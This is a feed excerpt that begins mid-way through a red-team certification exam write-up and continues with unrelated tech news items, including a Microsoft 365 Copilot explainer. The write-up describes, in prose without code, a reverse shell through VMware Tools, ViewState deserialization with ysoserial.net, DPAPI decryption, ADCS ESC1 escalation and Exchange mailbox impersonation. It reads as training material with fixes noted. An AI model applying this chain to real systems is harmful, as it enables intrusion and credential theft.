free-text annotation/notes field attached to each VM object.</p><p>Notes fields on virtual machines are a surprisingly common dumping ground for exactly the kind of information that should never live there — and this environment was no exception. One particular guest VM had its local credentials sitting in plaintext in its own annotation field, visible to anyone with sufficient ESXi permissions to query VM metadata.</p><p>With ESXi root privileges and VMware Tools confirmed present on the target guest, the final move didn’t require touching the guest’s network interface at all. VMware Tools exposes a guest operations API that lets an ESXi-privileged operator execute arbitrary processes directly inside a running guest VM, authenticated with the guest’s own local credentials, entirely out-of-band from the guest’s actual network stack. I used this to launch a reverse shell process inside the guest, landing an interactive session on what the environment had positioned as its most sensitive internal system — completing the unauthenticated attack path from a bare IP range down to code execution on a hardened internal Linux host, entirely through Active Directory, certificate services, and hypervisor misconfigurations chained together.</p><h3>Path 2: Authenticated Adversary</h3><p>Path 2 starts from a completely different assumption: you already have low-privilege, unauthenticated-but-network-reachable access to a single public-facing IIS web application, and the objective is privilege escalation and lateral movement from that single entry point through to sensitive business data.</p><h3>Breaking the ASP.NET ViewState</h3><p>The target application was a fairly standard ASP.NET Web Forms site — the kind of legacy internal tooling that telecom operators tend to keep running long past its expected lifespan. Web Forms pages carry a hidden __VIEWSTATE field that encodes serialized page state, cryptographically signed (and optionally encrypted) using a machine key configured in the application’s web.config. If that machine key is ever exposed, the ViewState mechanism — designed purely for tamper protection — becomes a fully general .NET deserialization gadget, because the framework will happily deserialize and execute anything correctly signed with the right key.</p><p>The application exposed a reporting feature that read files from the local filesystem based on a URL parameter, with essentially no path validation. That’s a textbook local file inclusion primitive, and the highest-value target for it was obvious: the application’s own web.config, which — as is unfortunately common — held its ViewState validation key and algorithm directly in cleartext, alongside a setting that explicitly relaxed the URL-to-filesystem mapping to make path traversal easier rather than harder.</p><p>With the validation key, the algorithm, and the ViewState generator value scraped from the page’s own markup, I had everything ysoserial.net needs to forge a malicious ViewState blob. The TextFormattingRunProperties gadget chain — which abuses a WPF-related deserialization path to spawn an arbitrary process — turned that forged, correctly-signed ViewState payload into direct remote code execution the moment it was replayed against the application’s own postback endpoint. No credentials, no authentication bypass in the traditional sense — just a trust boundary (the machine key) that had leaked into a place it was never supposed to be reachable from.</p><h3>Registry Credentials and DPAPI</h3><p>Command execution through the ViewState gadget landed in the context of the IIS application pool identity — not a domain account, but still a foothold worth building on. A search through predictable locations on the host surfaced a custom internal application with its own registry key under HKLM\SOFTWARE, storing a domain service account’s username in cleartext alongside a Base64-encoded, DPAPI-protected password blob.</p><p>Storing secrets in a machine-scoped registry hive that any local process can read is already a mistake, but the developer had additionally used DPAPI’s LocalMachine protection scope rather than CurrentUser — meaning any process running on that specific machine, regardless of which user account it’s running as, can decrypt the blob using nothing but the machine’s own DPAPI master key. A short PowerShell snippet using the standard System.Security.Cryptography.ProtectedData class was enough to unwrap it and recover a plaintext domain credential for a genuinely useful service account.</p><h3>A Second Path Through ADCS</h3><p>That newly recovered service account turned out to have its own enrollment rights on a different certificate template in the same PKI — again vulnerable to the same ESC1 misconfiguration pattern seen in Path 1, just via a different template and a different starting account. The exploitation mechanics were identical: enumerate the vulnerable template, retrieve the target’s SID over RPC, forge a certificate request asserting the Domain Administrator’s identity, authenticate with the issued certificate, and recover the corresponding NT hash — landing Domain Admin from an entirely different starting point than Path 1, but through the same underlying PKI weakness. It’s a good illustration of why a single vulnerable certificate template rarely stays contained to one attack path; if more than one principal can enroll against it, it’s effectively a shared skeleton key for the domain.</p><p>From there, authenticating directly to the domain controller as Domain Admin opened up the full SMB share tree, and a look through the Windows Task Scheduler’s on-disk task definitions turned up something unusual: a scheduled task configured to run a PowerShell script under the Administrator’s own context, seemingly for routine mailbox maintenance. Pulling that script down and reading through it revealed hardcoded Exchange service credentials — again stored in plaintext, this time inside a script whose entire purpose was mailbox automation.</p><h3>Exchange Impersonation and Mailbox Enumeration</h3><p>The credentials recovered from that scheduled task belonged to an operations-focused service account, and a quick programmatic check against the Exchange server confirmed it had been granted the ApplicationImpersonation management role — an Exchange RBAC role that, by design, allows a single service account to act on behalf of any mailbox in the organization without needing that mailbox’s own credentials. It’s an entirely legitimate feature meant for backup, migration, and integration tooling, but when the account holding it also has weak or exposed credentials, it collapses into a universal mailbox-reading primitive.</p><p>Using the Exchange Web Services API with that account’s impersonation rights pointed at the Administrator’s own mailbox, I was able to enumerate the Inbox, Sent Items, and Drafts folders directly — no need to ever touch the Administrator’s actual password. Reading through the recovered correspondence surfaced exactly the kind of operational detail that internal email threads tend to accumulate over time: database credentials shared between a DBA and an operations contact for a production SQL instance, network infrastructure access details passed along in a router-maintenance thread, and references to an internal marketing campaign server mentioned in passing in an unrelated message chain. None of this was the result of a single exploit — it was simply what falls out of an inbox that’s been collecting operational chatter for months, once you have legitimate-looking read access to it.</p><p>That last stretch of Path 2 is worth reflecting on separately, because it’s a different category of finding than everything before it. Getting to Domain Admin via ADCS ESC1 is a hard technical exploit with a clean root cause and a clean fix — restrict enrollment rights, disable enrollee-supplied subject, or require manager approval on the template. Reading sensitive operational secrets out of an executive’s inbox because a service account with impersonation rights had weak credentials is a softer, more human failure mode — and honestly the one that’s hardest to fully close, because impersonation itself is a legitimate and necessary Exchange feature. The fix there isn’t technical elimination, it’s credential hygiene and RBAC scoping: impersonation rights should be scoped to the specific mailboxes a given integration actually needs, not granted organization-wide by default, and any account holding that role deserves the same protection posture as a Domain Admin account, because functionally it often is one.</p><h3>Closing Thoughts</h3><p>Looking back at both paths together, the pattern that stands out most isn’t any single vulnerability class — it’s how often the misconfigurations were individually mundane and collectively devastating. A DNS server that shouldn’t allow zone transfers. An account that shouldn’t skip Kerberos pre-auth. A certificate template that shouldn’t let requesters pick their own identity. A registry key that shouldn’t hold a password, even an encrypted one, at machine scope. A scheduled task script that shouldn’t hardcode credentials. None of these individually would make a headline vulnerability disclosure. Chained together, in the right order, they took an anonymous position on a /24 all the way to Domain Admin and hypervisor-level code execution, twice, through two completely different entry points.</p><p>That’s really the entire thesis of AD-RTS as a certification, and it’s the same lesson every serious AD engagement eventually teaches: defenders tend to think in terms of individual controls, and attackers think in terms of paths. The environments that hold up aren’t the ones with zero misconfigurations — that bar doesn’t exist in any real enterprise — they’re the ones where no single chain of small mistakes reaches all the way to the crown jewels.</p><p>If you’re working through AD-RTS yourself, my honest advice is to resist the urge to jump straight to the tooling. Every phase of this exam rewards understanding why a technique works before running it — ASREPRoasting only makes sense once you understand what Kerberos pre-authentication is actually protecting against, and ESC1 only clicks once you understand what a certificate template’s enrollment permissions and SAN policy are actually meant to enforce. The course material front-loads that theory for a reason.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*B-p06VDmeewZgy9f12e7jQ.png"></figure><p><em>If you found this useful, feel free to connect on</em> <a href="https://linkedin.com/in/camalzads"><em>LinkedIn</em></a> <em>or check out my tools on</em> <a href="https://github.com/alisalive"><em>GitHub</em></a><em>.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=40f5e9450703" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/certified-ad-red-team-specialist-ad-rts-full-exam-write-up-40f5e9450703">Certified AD Red Team Specialist (AD-RTS): Full Exam Write-Up</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to Decipher July's Most Popular Emoji]]></title>
<description><![CDATA[Kind of surprised the American flag and the fireworks emoji aren't more popular because of the Fourth of July, if I'm being honest.]]></description>
<link>https://tsecurity.de/de/3643438/it-nachrichten/how-to-decipher-julys-most-popular-emoji/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643438/it-nachrichten/how-to-decipher-julys-most-popular-emoji/</guid>
<pubDate>Fri, 03 Jul 2026 13:48:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Kind of surprised the American flag and the fireworks emoji aren't more popular because of the Fourth of July, if I'm being honest.]]></content:encoded>
</item>
<item>
<title><![CDATA[GMKTec’s new $3,600 mini PC recycles Ryzen AI Max+ 395 CPU, adds proprietary OpenClaw agent and towering skyscraper design]]></title>
<description><![CDATA[GMKtec redesigned its Strix Halo workstation around cooling, local inference, and substantially higher memory capacities for AI.]]></description>
<link>https://tsecurity.de/de/3642511/it-nachrichten/gmktecs-new-3600-mini-pc-recycles-ryzen-ai-max-395-cpu-adds-proprietary-openclaw-agent-and-towering-skyscraper-design/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642511/it-nachrichten/gmktecs-new-3600-mini-pc-recycles-ryzen-ai-max-395-cpu-adds-proprietary-openclaw-agent-and-towering-skyscraper-design/</guid>
<pubDate>Fri, 03 Jul 2026 02:32:16 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[GMKtec redesigned its Strix Halo workstation around cooling, local inference, and substantially higher memory capacities for AI.]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft stellt Azure Linux 4.0 kostenlos zur Verfügung]]></title>
<description><![CDATA[Azure Linux 4.0 basiert auf Fedora 43 und erhält Sicherheits-Updates von Microsoft.Microsoft



Azure Linux 4.0 – ein Open-Source-Betriebssystem auf Linux-Basis – wurde auf der Entwicklerkonferenz Build 2026 von Microsoft vorgestellt. Im Gegensatz zu früheren Versionen soll Microsofts Linux-Distr...]]></description>
<link>https://tsecurity.de/de/3641372/it-security-nachrichten/microsoft-stellt-azure-linux-40-kostenlos-zur-verfuegung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641372/it-security-nachrichten/microsoft-stellt-azure-linux-40-kostenlos-zur-verfuegung/</guid>
<pubDate>Thu, 02 Jul 2026 15:53:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/Azure-Linux-4.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Azure Linux 4" class="wp-image-4190988" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Azure Linux 4.0 basiert auf Fedora 43 und erhält Sicherheits-Updates von Microsoft.</p></figcaption></figure><p class="imageCredit">Microsoft</p></div>



<p><a href="https://learn.microsoft.com/en-us/azure/azure-linux/whats-new-azure-linux-4">Azure Linux 4.0</a> – ein Open-Source-Betriebssystem auf Linux-Basis – wurde auf der Entwicklerkonferenz <a href="https://www.computerwoche.de/article/4180429/build-2026-microsoft-stellt-autonomen-ki-agenten-auf-basis-von-openclaw-vor.html" target="_blank">Build 2026</a> von Microsoft vorgestellt. Im Gegensatz zu früheren Versionen soll Microsofts Linux-Distribution nun kostenlos verfügbar sein.</p>



<p>Technisch basiert Azure Linux 4.0 auf Fedora 43 und nutzt dasselbe <a href="https://de.wikipedia.org/wiki/RPM_Package_Manager" target="_blank" rel="noreferrer noopener">RPM-basierte Paketverwaltungssystem</a>. <a href="https://www.windowslatest.com/2026/06/29/microsoft-called-linux-a-cancer-now-ships-its-own-free-distro-thats-nothing-like-ubuntu-or-fedora/" target="_blank" rel="noreferrer noopener">Berichten</a> zufolge wurde das Linux-Derivat optimiert, um Workloads auf dem Azure-Cloud-Dienst auszuführen. Um Fehlerbehebungen und Sicherheits-Updates will sich Microsoft kümmern.</p>



<p>Azure Linux 4.0 ist nicht für Endverbraucher konzipiert und deshalb textbasiert. Deswegen beträgt die Größe auch nur knapp unter 300 Megabyte.</p>



<p>Es kann ab sofort über den <a href="https://marketplace.microsoft.com/sv-se/product/saas/microsoftazurelinux.azurelinux-4?tab=overview" target="_blank" rel="noreferrer noopener">Microsoft Marketplace</a> heruntergeladen werden. (tf)</p>



<p>Dieser Artikel ist im <a href="https://computersweden.se/article/4190975/microsoft-gor-azure-linux-4-0-gratis-att-anvanda.html">Original</a> bei unserer Schwesterpublikation Computersweden.se erschienen.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Yep, we’re using OpenClaw to date now]]></title>
<description><![CDATA[Ben Guez has "a bunch of potential international wives in [his] DMs," thanks to an automated script he set up using OpenClaw, Claude code, and Instagram trials.]]></description>
<link>https://tsecurity.de/de/3641038/it-nachrichten/yep-were-using-openclaw-to-date-now/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641038/it-nachrichten/yep-were-using-openclaw-to-date-now/</guid>
<pubDate>Thu, 02 Jul 2026 14:03:17 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ben Guez has "a bunch of potential international wives in [his] DMs," thanks to an automated script he set up using OpenClaw, Claude code, and Instagram trials.]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft 365 Copilot: Office meets genAI and agents]]></title>
<description><![CDATA[Initially launched in November 2023, Microsoft 365 Copilot brings a range of generative AI (genAI) features to Microsoft Office productivity apps, such as Word, Outlook, Teams, and Excel. With capabilities ranging from quick meeting summaries to in-depth data analysis, it’s available via a paid a...]]></description>
<link>https://tsecurity.de/de/3640909/it-nachrichten/microsoft-365-copilot-office-meets-genai-and-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640909/it-nachrichten/microsoft-365-copilot-office-meets-genai-and-agents/</guid>
<pubDate>Thu, 02 Jul 2026 13:18:10 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Initially launched in November 2023, Microsoft 365 Copilot brings a range of generative AI (genAI) features to Microsoft Office productivity apps, such as Word, Outlook, Teams, and Excel. With capabilities ranging from quick meeting summaries to in-depth data analysis, it’s available via a paid add-on license for <a href="https://www.computerworld.com/article/1691110/microsoft-365-explained.html">Microsoft 365</a> enterprise and small-business customers.</p>



<p>Initially hampered by <a href="https://www.computerworld.com/article/2513395/copilot-for-microsoft-365-review-hands-on-deep-dive.html">underwhelming capabilities</a> and a hefty price tag for businesses of all sizes, M365 Copilot has slowly gained traction in business as its abilities have increased and the integrations between Copilot and various M365 apps and services have improved. With numerous feature rollouts over the past three years, Microsoft has gradually repositioned M365 Copilot from a simple chatbot to a collection of autonomous agents that can carry out tasks across the M365 ecosystem.</p>



<p>The company has also goosed adoption by introducing a <a href="https://www.computerworld.com/article/4093224/microsoft-drops-m365-copilot-price-for-smbs-upgrades-free-copilot-chat.html">more affordable pricing tier for small businesses</a> and (temporarily, as it turns out) allowing commercial users with a standard M365 license to <a href="https://www.computerworld.com/article/4058429/copilot-chat-comes-to-m365-apps-for-no-extra-cost.html">use Copilot in the Office apps</a>, even without the add-on M365 Copilot license.</p>



<h3 class="wp-block-heading">Microsoft 365 Copilot pricing: 2026 tiers</h3>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table><tbody><tr><td><strong>Tier</strong></td><td><strong>Monthly cost (paid annually)</strong></td><td><strong>Availability</strong></td></tr><tr><td><a href="https://www.microsoft.com/en-us/microsoft-365-copilot/pricing/enterprise" target="_blank" rel="noreferrer noopener">M365 Copilot</a></td><td>$30 / user</td><td>For organizations with more than 300 seats; required for in-app Copilot integration in organizations with more than 2,000 seats</td></tr><tr><td><a href="https://www.microsoft.com/en-us/microsoft-365-copilot/pricing" target="_blank" rel="noreferrer noopener">M365 Copilot Business</a></td><td>$21 / user</td><td>For organizations with 10 – 300 seats</td></tr><tr><td><a href="https://www.microsoft.com/en-us/microsoft-agent-365#plans-and-pricing" target="_blank" rel="noreferrer noopener">Agent 365</a> (add-on management layer)</td><td>$15 / user</td><td>Available as standalone subscription or included in the new M365 E7 Frontier Suite</td></tr></tbody></table> </div></figure>



<h2 class="wp-block-heading">Microsoft 365 Copilot today</h2>



<p>In this way, Microsoft 365 Copilot has moved from genAI curiosity to a key part of many enterprises’ workflows. In January 2026, Microsoft said it had <a href="https://www.computerworld.com/article/4124591/microsoft-touts-m365-copilot-momentum-claims-15m-paid-users.html">15 million paid M365 Copilot seats</a>, a figure the company <a href="https://techcrunch.com/2026/04/29/microsoft-says-it-has-over-20m-paid-copilot-users-and-they-really-are-using-it/" target="_blank" rel="noreferrer noopener">raised to 20 million</a> in April.</p>



<p>However, its momentum now faces a challenge as <a href="https://www.computerworld.com/article/4150022/microsoft-backtracks-on-copilot-chat-access-in-m365-apps.html">Microsoft limits access to Copilot Chat</a>, a freemium version of the paid M365 Copilot, for its largest enterprise customers. </p>



<p>Specifically, for commercial customers with more than 2,000 seats, Microsoft has removed in-app Copilot Chat access from Word, Excel, and PowerPoint for users without a Microsoft 365 Copilot license. To maintain that integration, large organizations must now pay for the full $30/user/month M365 Copilot license. The M365 Copilot license includes what Microsoft calls priority access to Copilot capabilities, which provides “faster response times and more consistent availability compared to standard access,” according the the company. </p>



<p>Smaller firms (less than 2,000 seats) that have a Microsoft 365 license but not the add-on M365 Copilot license will maintain standard access to Copilot from within the Office apps. <a href="https://support.microsoft.com/en-gb/topic/standard-versus-priority-access-to-features-in-microsoft-365-copilot-chat-12c8d9f8-db32-4f99-8ebe-d8d85879137f">Microsoft warns</a> that standard users may experience longer response times and temporary feature limitations as the service shifts resources to its higher-tier customers during peak hours.</p>



<p>When signed in to the <a href="https://m365.cloud.microsoft/" target="_blank" rel="noreferrer noopener">Copilot Chat hub</a>, users can see which version of Copilot they have by looking for one of the following labels at the bottom of the left sidebar:</p>



<ul class="wp-block-list">
<li><strong>Copilot Chat (Basic)</strong> means the user doesn’t have an M365 Copilot license and can’t use Copilot in the Office apps. They can use the standalone Copilot Chat app with standard access.</li>



<li><strong>M365 Copilot (Basic)</strong> means the user doesn’t have an M365 Copilot license but does have standard access to Copilot in the Office apps.</li>



<li><strong>M365 Copilot (Premium)</strong> means the user has an M365 Copilot license and has priority access to Copilot in the Office apps.</li>
</ul>



<p>Users with paid M365 Copilot licenses also get advanced features including the ability to pull in data from across the M365 environment (documents, meetings, emails, chats, etc.), extensive use of agents including “advanced” agents like Researcher and Analyst, and the ability to create custom agents. See Microsoft’s “<a href="https://support.microsoft.com/en-us/microsoft-365-copilot/how-copilot-chat-works-with-and-without-a-microsoft-365-copilot-license" target="_blank" rel="noreferrer noopener">How Copilot Chat works with and without a Microsoft 365 Copilot license</a>” page for details.</p>



<aside class="sidebar">
<h3><strong>What’s new with Microsoft 365 Copilot</strong></h3>
&gt;
<li> <strong>Licensing shift:</strong> Large enterprises (more than 2,000 seats) cannot access Copilot directly in Office apps without the M365 Copilot license.</li>
<li><strong>Multimodel access:</strong> M365 Copilot now supports non-OpenAI models like Anthropic’s Claude 4, allowing users to choose the best logic for specific tasks.</li>
<li><strong>Agentic pivot:</strong> The focus shifts from simple chat to autonomous agents that execute multi-step workflows across the M365 ecosystem.</li>

</aside>




<h2 class="wp-block-heading">What other Copilots does Microsoft offer?</h2>



<p>It’s worth noting that Microsoft uses the term “Copilot” for a wide variety of genAI tools and functions. Individual users with M365 Personal, Family, and Premium subscriptions <a href="https://www.computerworld.com/article/3806855/copilot-ai-microsoft-365.html">can use Copilot in Office apps</a>, but with fewer features and privileges than business users get with a Microsoft 365 Copilot license. There’s also a <a href="https://www.computerworld.com/article/1611598/microsoft-copilot-tips-how-to-use-copilot-right.html">free consumer version of Copilot</a> with very limited functionality. </p>



<p>Adding to the confusion, the company offers several specialized enterprise versions of Copilot for specific purposes, including <a href="https://learn.microsoft.com/en-us/microsoft-copilot-studio/" target="_blank" rel="noreferrer noopener">Microsoft Copilot Studio</a>, <a href="https://learn.microsoft.com/en-us/copilot/security/" target="_blank" rel="noreferrer noopener">Microsoft Security Copilot</a>, <a href="https://learn.microsoft.com/en-us/azure/copilot/" target="_blank" rel="noreferrer noopener">Azure Copilot</a>, and <a href="https://www.infoworld.com/article/3609013/github-copilot-everything-you-need-to-know.html" target="_blank">GitHub Copilot</a>, as well as additional Copilot “experiences” for Microsoft products such as <a href="https://learn.microsoft.com/en-us/dynamics365/copilot/ai-get-started" target="_blank" rel="noreferrer noopener">Dynamics 365</a>, <a href="https://learn.microsoft.com/en-us/power-platform/copilot" target="_blank" rel="noreferrer noopener">Power Platform</a>, and <a href="https://learn.microsoft.com/en-us/fabric/fundamentals/copilot-fabric-overview" target="_blank" rel="noreferrer noopener">Microsoft Fabric</a>. </p>



<p>Also available: agents in M365 Copilot built for specific industries, including <a href="https://learn.microsoft.com/en-us/copilot/finance/" target="_blank" rel="noreferrer noopener">finance</a>, <a href="https://learn.microsoft.com/en-us/microsoft-sales-copilot/" target="_blank" rel="noreferrer noopener">sales</a>, and <a href="https://learn.microsoft.com/en-us/microsoft-copilot-service/" target="_blank" rel="noreferrer noopener">service</a>.</p>



<h2 class="wp-block-heading">From chatbot to multi-model researcher to agentic powerhouse</h2>



<p>Microsoft has moved away from a single-model approach for its AI assistant. Copilot Chat has evolved into a Frontier interface, allowing users to select among different LLMs (large language models) such as GPT-5.4 and Anthropic Claude 4 for specialized tasks.</p>



<p>A persistent AI risk for enterprises is overly permissive data access. Because Copilot inherits the permissions of the user, any file that is improperly shared within an organization can be surfaced by the AI. To combat the issue of business-critical files that are at risk due to inappropriate classification, <a href="https://learn.microsoft.com/en-us/purview/copilot-in-purview-overview" target="_blank" rel="noreferrer noopener">Microsoft has integrated Purview Data Security Posture Management (DSPM)</a> more deeply into Copilot, alerting users when they are generating content from unclassified or sensitive sources.</p>



<p>Other recently introduced M365 Copilot features include:</p>



<ul class="wp-block-list">
<li><a href="https://support.microsoft.com/en-us/topic/get-started-with-researcher-in-microsoft-365-copilot-e63ab760-f3de-4c47-ae87-dad601b0e9c4" target="_blank" rel="noreferrer noopener">Copilot Researcher</a><strong>:</strong> This feature allows the assistant to pull from multi-model intelligence, comparing perspectives from different AI models side-by-side to reduce hallucinations.</li>



<li><a href="https://support.microsoft.com/en-us/topic/get-started-with-microsoft-365-copilot-notebooks-0775e693-11c6-4d80-8aba-fcc81a737a06" target="_blank" rel="noreferrer noopener">Copilot Notebooks</a><strong>:</strong> Notebooks allow you to ground the AI in specific project context. These can now be exported directly into structured Excel spreadsheets or PowerPoint decks, bypassing the need for manual copy and pasting.</li>



<li><a href="https://support.microsoft.com/en-us/office/interpreter-in-microsoft-teams-meetings-and-calls-c7efe2bb-535d-42ab-a5c4-d2d91619b46d" target="_blank" rel="noreferrer noopener">Teams Interpreter</a><strong>:</strong> Integrated directly into Teams Phone, Interpreter is designed to provide real-time, AI-powered language interpretation during live calls, a boon for global enterprise operations.</li>



<li><a href="https://www.computerworld.com/article/4080435/m365-copilot-now-lets-you-build-apps-and-agents-with-natural-language-prompts.html">App Builder</a>: A no-code tool that lets business users create apps, workflows, and agents using natural language prompts. It’s essentially a “lite” version of Microsoft’s high-end Copilot Studio environment for developers.</li>



<li><a href="https://www.computerworld.com/article/4163305/agent-mode-is-now-available-in-microsoft-word-excel-and-powerpoint.html">Agents for Word, Excel, and PowerPoint</a>: Advanced modes that allow Copilot to take direct action on documents and files rather than simply suggest changes. </li>
</ul>



<p>Even more notable was the June <a href="https://www.computerworld.com/article/4186190/microsoft-launches-copilot-cowork-with-usage-based-pricing.html">launch of Copilot Cowork</a>, which Microsoft pitches as an AI agent for M365 Copilot that can independently perform long-running, multi-step tasks, even when a user’s computer is turned off. Unlike Anthropic’s Claude Cowork, which can interact directly with files and applications on a user’s computer, Copilot Cowork runs in Microsoft’s cloud environment and acts on documents held in a customer’s Microsoft 365 tenant. Copilot Cowork requires a Microsoft 365 Copilot license and is billed based on usage.</p>



<p>Another announcement that caused a stir was Microsoft’s unveiling of Scout, its first <a href="https://www.computerworld.com/article/4180103/microsoft-unveils-scout-an-autonomous-ai-agent-built-on-openclaw.html">autonomous agent built on the open-source OpenClaw platform</a>. By integrating OpenClaw-style agentic capabilities, Microsoft hopes to transform Copilot into an always-on system that can, for instance, scan Outlook email inboxes and calendars to suggest daily priorities. Microsoft’s implementation addresses security concerns around self-hosted agents by isolating professional-grade “autopilots” within specific roles and applying managed permission guardrails. Scout is available as an “experimental release” to customers of Microsoft’s Frontier program.</p>



<p>Industry analysts note that these tools are new and unproven, and IT leaders should use caution when testing them and evaluating costs.</p>



<h2 class="wp-block-heading">Managing AI agent sprawl: Enter Agent 365</h2>



<p>As organizations move beyond simple chat to building custom <a href="https://learn.microsoft.com/en-us/microsoft-365/copilot/extensibility/overview-declarative-agent" target="_blank" rel="noreferrer noopener">declarative agents</a> in Copilot Studio, the risk of <a href="https://www.cio.com/article/4129630/shadow-ai-practices-a-wakeup-call-for-enterprises.html" target="_blank">shadow AI </a>has become a concern. Gartner reports that 86% of IT leaders require additional governance to manage these agents.</p>



<p>Available as an add-on subscription for Microsoft 365 or bundled in the top-end M365 E7 package, <a href="https://www.computerworld.com/article/4092436/microsoft-unveils-agent-365-to-help-it-manage-ai-agent-sprawl.html">Agent 365</a> acts as a control plane for the AI ecosystem. Unlike the user-facing Copilot, Agent 365 is a back-end dashboard that allows IT admins to manage agents in various ways:</p>



<ol start="1" class="wp-block-list">
<li><strong>Registry and lifecycle management:</strong> View every agent — Microsoft, third-party, or internally developed — in a “single-pane-of-glass” dashboard.</li>



<li><strong>Policy-based guardrails:</strong> Admins can set global rules to prevent agents from accessing high-sensitivity data (like payroll), even if the human user has permission.</li>



<li><strong>Unified ROI analytics:</strong> Leaders can track which agents are actually driving value, allowing for precise seat-count adjustments during renewal cycles.<br><br></li>
</ol>



<h3 class="wp-block-heading">Microsoft Agent 365 quick facts</h3>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table><tbody><tr><td>Pricing</td><td>$15 / user / month (as an add-on) or included in the Microsoft 365 E7 suite ($99 / user / month)</td></tr><tr><td>Core functions</td><td>Centralized registry, access control, and performance analytics for all AI agents</td></tr><tr><td>Objective</td><td>Designed to prevent agent sprawl and ensure agents from partners (e.g., Adobe, ServiceNow, etc.) follow M365 security rules</td></tr></tbody></table> </div></figure>



<p>Gartner says that Agent 365 is still a work in progress and has yet to prove it can actually reduce costs in IT operations. The analyst firm advises customers to assess Agent 365 but not necessarily move to it or the E7 bundle right away.</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<h2 class="wp-block-heading">Copilot vs. AI in other productivity apps</h2>



<p>Most vendors in the productivity and collaboration software market have added genAI and agentic tools to their offerings at this point.</p>



<p>The rivalry between Microsoft and Google has heightened in 2026. While Google has <a href="https://www.computerworld.com/article/4136922/google-gemini-3-years.html#:~:text=Gemini%E2%80%99s%20simplest%20struggles">faced criticism</a> for a messy transition from the Google Assistant to Gemini, it remains a price leader by <a href="https://www.computerworld.com/article/3804055/google-ups-workspace-price-makes-gemini-ai-features-available-for-free.html">embedding Gemini features directly</a> into most tiers of its office suite, <a href="https://www.computerworld.com/article/3570821/google-workspace-explained-googles-answer-to-microsoft-365.html">Google Workspace</a>.</p>



<p>In contrast, Microsoft seems to be threading a needle, tightening Copilot Premium licensing for large enterprises while making basic Copilot features available to smaller customers without an add-on license. The goal may be to standardize AI as a commodity while reserving the high-value agentic features for the highest-paying enterprise customers.</p>



<p>While Microsoft focuses on the productivity suite, Salesforce is positioning Slack as the “agentic operating system” for the enterprise. As of April 2026, <a href="https://www.computerworld.com/article/4153622/slacks-ai-updates-signal-shift-towards-agent-orchestration.html">Slack AI has moved beyond summarizing to orchestrating agentic workflows</a>. This is designed let you trigger complex, multi-step actions across non-Microsoft systems directly from a Slack thread.</p>



<p>Salesforce’s Agentforce platform uses the Atlas Reasoning Engine, which is designed to offer autonomous front-office automation (sales, service, and marketing). For organizations where CRM data is more critical than Word documents, Agentforce is emerging as a formidable, high-ROI alternative to Copilot.</p>



<aside class="sidebar">
<h3><strong>Gartner’s 5 stages of agentic AI evolution</strong></h3>
&gt; Gartner projects that agentic AI could drive approximately 30% of enterprise application software revenue by 2035. The analyst firm’s roadmap  identifies five maturity stages for IT leaders: 

&gt;
<li><strong>2025: AI assistants:</strong> Embedded helpers that simplify tasks but remain dependent on human input</li>
<li><strong>2026: Task-specific agents:</strong> Agents capable of end-to-end complex tasks, such as real-time cybersecurity-threat response</li>
<li><strong>2027: Collaborative agents:</strong> Multi-agent systems that work together across data environments to solve multifaceted business problems</li>
<li><strong>2028: Agentic front ends:</strong> A shift where a third of user experiences move away from native apps toward “agentic interfaces” that navigate multiple apps on behalf of the user</li>
<li><strong>2029: Democratized ecosystems:</strong> A new normal where 50% of knowledge workers actively govern or create agents on demand for complex tasks</li>

</aside>




<p>In March 2026, <a href="https://www.computerworld.com/article/4149464/apple-goes-global-with-key-mdm-tools-and-services-for-business.html">Apple launched Apple Business</a>, a platform designed to integrate Apple Intelligence directly into macOS and iOS. Apple claims its competitive edge is its on-screen awareness. Unlike cloud-heavy competitors, Apple Intelligence is built to act across apps locally, appealing to regulated industries concerned about data leakage.</p>



<p>Apple Business now supports automated Managed Apple Accounts via integration with Microsoft Entra ID, a feature designed to let IT teams manage Apple’s AI features using their Microsoft identity stack.</p>



<p>As Microsoft tightens the reins on free access, the question for enterprise IT leaders is no longer whether Copilot can summarize a meeting, but whether the $30-per-month leap delivers enough agentic automation to justify the cost. For many, the answer will lie in the effectiveness of Agent 365 in bringing order to the burgeoning fleet of AI workers.</p>



